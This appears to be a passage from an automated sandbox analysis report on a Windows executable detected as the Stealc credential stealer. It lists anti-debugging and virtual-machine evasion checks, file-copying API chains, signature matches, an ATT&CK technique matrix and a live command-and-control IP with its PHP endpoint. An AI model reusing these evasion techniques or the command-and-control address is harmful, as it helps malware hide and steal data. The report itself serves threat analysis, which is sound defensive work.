                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7406AB second address: 7406BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA19Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7408AE second address: 7408B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7408B2 second address: 7408B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7408B6 second address: 7408C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jc 00007F46B8B98B06h 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40268 second address: 4D4026C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D4026C second address: 4D40270 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40270 second address: 4D40276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40276 second address: 4D402F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F46B8B98B12h 0x00000009 or si, F2B8h 0x0000000e jmp 00007F46B8B98B0Bh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F46B8B98B18h 0x0000001a sbb ecx, 46062D18h 0x00000020 jmp 00007F46B8B98B0Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F46B8B98B14h 0x00000032 add esi, 4B1E1778h 0x00000038 jmp 00007F46B8B98B0Bh 0x0000003d popfd 0x0000003e push ecx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40343 second address: 4D40348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40348 second address: 4D40379 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F46B8B98B0Eh 0x00000008 jmp 00007F46B8B98B12h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D40379 second address: 4D403BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F46B8DCA1A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F46B8DCA1A0h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F46B8DCA1A7h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C723 second address: 66C727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C727 second address: 66C731 instructions: 0x00000000 rdtsc 0x00000002 je 00007F46B8DCA196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C731 second address: 66C737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 4C1B5F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 65D904 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002738B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_002738B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00274910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00274910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0026DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0026DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0026E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0026E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0026ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0026ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00274570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00274570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0026DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0026DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0026BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0026BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00273EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00273EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0026F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0026F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002616D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002616D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00261160 GetSystemInfo,ExitProcess,0_2_00261160
                Source: file.exe, file.exe, 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1800007747.0000000000E69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWy
                Source: file.exe, 00000000.00000002.1800007747.0000000000E0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware]
                Source: file.exe, 00000000.00000002.1800007747.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1800007747.0000000000E55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1800007747.0000000000E0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13481
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13484
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13535
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13495
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13503
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002645C0 VirtualProtect ?,00000004,00000100,000000000_2_002645C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00279860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00279860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00279750 mov eax, dword ptr fs:[00000030h]0_2_00279750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00277850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00277850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6960, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00279600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00279600
                Source: file.exe, file.exe, 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: [Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00277B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00276920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00276920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00277850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00277850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00277A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00277A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.260000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1800007747.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1758315822.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6960, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.260000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1800007747.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1758315822.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6960, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/ws100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/nfile.exe, 00000000.00000002.1800007747.0000000000E69000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37file.exe, 00000000.00000002.1800007747.0000000000E0E000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  		unknown
                  http://185.215.113.37/wsfile.exe, 00000000.00000002.1800007747.0000000000E69000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  		unknown
                  http://185.215.113.37D~ffile.exe, 00000000.00000002.1800007747.0000000000E0E000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.php3Sfile.exe, 00000000.00000002.1800007747.0000000000E8C000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      185.215.113.37
                      		unknownPortugal
                      		206894WHOLESALECONNECTIONSNLtrue

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1532351
                      Start date and time:2024-10-13 01:28:08 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 3m 7s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:1
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 80%
                      • Number of executed functions: 19
                      • Number of non-executed functions: 87
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Stop behavior analysis, all processes terminated

                      Warnings

                      • VT rate limit hit for: file.exe

                      Simulations

                      Behavior and APIs

                      No simulations

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      No created / dropped files found

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.946680839484712
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:1'801'216 bytes
                      MD5:cfdd8a903441555e23417125bccc4e60
                      SHA1:5ee09d72d09a587d1399d651d5e2d3e199899ae3
                      SHA256:51104c217fb4ac57c1ef1071eaf80c801e17a2ca4c1b83a31d2d7a43b5f22671
                      SHA512:2f05454ec5fdccc149959a39fba755223998a6c23828cef3fb893f70ceaed253d6ebee511356aeb315a73d77e839aef3bddde0e4fe6736be952adedd945aa853
                      SSDEEP:24576:lKs9OT6FhNwzGxqIhUcoevXJ7/bJDq74o83qbwY+l7CicoU4k3UxICaS6:lbY6PCjzc5h9mE9aZ+leiVLmUxICaS
                      TLSH:DE853319DE219AD9FD9DDB7599DD939C320C390938F8C06F3AC902F119EF30998225A7
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                      File Icon

                      Icon Hash:90cececece8e8eb0

                      Static PE Info

                      General

                      Entrypoint:0xa82000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                      Entrypoint Preview

                      Instruction
                      jmp 00007F46B881826Ah
                      cvtps2pd xmm3, qword ptr [ebx]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add cl, ch
                      add byte ptr [eax], ah
                      add byte ptr [eax], al
                      add byte ptr [edx+ecx], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      xor byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add dword ptr [eax], eax
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      or byte ptr [eax+00000000h], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add eax, 0000000Ah
                      add byte ptr [eax], al
                      add byte ptr [eax], dh
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax+eax], ah
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      and dword ptr [eax], eax
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      mov cl, 80h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      xor byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add al, 00h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      and al, 00h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add dword ptr [eax+00000000h], eax
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add ecx, dword ptr [edx]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      xor byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [edx], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      push es
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Rich Headers

                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 build 30319

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
